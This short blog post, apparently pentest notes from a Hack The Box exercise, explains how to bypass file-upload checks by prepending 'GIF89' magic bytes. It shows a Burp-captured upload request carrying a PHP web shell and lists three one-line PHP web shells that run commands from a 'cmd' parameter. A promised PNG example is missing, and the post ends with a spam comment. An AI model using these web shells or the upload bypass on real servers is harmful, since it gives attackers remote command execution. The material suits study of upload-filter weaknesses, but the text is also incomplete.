Having "GIF89" at the start of the file means the server may interpret the file as a GIF.
Like so, capturing the file from burp.
Content-Disposition: form-data; name="fileToUpload"; filename="tux.htb"
Content-Type: image/gif
GIF89 <?php echo system($_REQUEST['cmd']); ?>
try to execute any command as "cmd" could allow code execution.
<?php echo system($_REQUEST['cmd']); ?>
or
<?php echo system($_GET['cmd']); ?>
or
<?php echo shell_exec($_GET['cmd']); ?>
If magicbytes are configured, then the server will look at the start of the file to see whether the file
looks like an image by its proceeding characters.
The below is the start of a png file that also includes a parameter of 'cmd' used for code execution after successful upload.
Thank You for sharing this informative post. Looking forward to reading more.
ReplyDeleteBest PHP Development Services in Delhi/NCR